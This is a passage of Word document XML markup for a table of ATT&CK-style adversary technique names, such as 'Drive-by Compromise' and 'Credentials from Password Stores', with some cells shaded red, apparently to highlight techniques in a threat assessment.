              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Automated Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="721BDB87" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Account Access Removal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C32C3" w:rsidRPr="001019D3" w14:paraId="4941A480" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71BAED2B" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Gather Victim Host Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B296E6D" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Acquire Infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F7E2356" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Drive-by Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="551E8EFB" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10600D07" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>BITS Jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FE070DA" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Access Token Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70563495" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Access Token Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="362C2CB8" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57BC5A98" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Application Window Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FEC6B8F" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Internal Spear-phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BE72DD5" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Archive Collected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ED618F9" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Communication Through Removable Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0688E512" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data Transfer Size Limits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CC8AA7F" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data Destruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C32C3" w:rsidRPr="001019D3" w14:paraId="64C7D157" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76509E95" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Gather Victim Identity Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DE0C367" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Compromise Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02B4F0E8" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="728AA761" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Container Administration Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C442FCC" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Boot or Logon AutoStart Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EEA83BE" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Account Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35CCF9AC" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>BITS Jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="139319D2" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Credentials from Password Stores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D525B11" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Browser Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B7C637C" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Lateral Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E014A63" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Audio Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="728F9699" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Content Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0991553C" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exfiltration Over Alternative Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="277F96C5" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data Encrypted for Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C32C3" w:rsidRPr="001019D3" w14:paraId="3E1C0EEA" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60B6E546" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Gather Victim Network Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63869322" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Compromise Infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CC75DFD" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>External Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
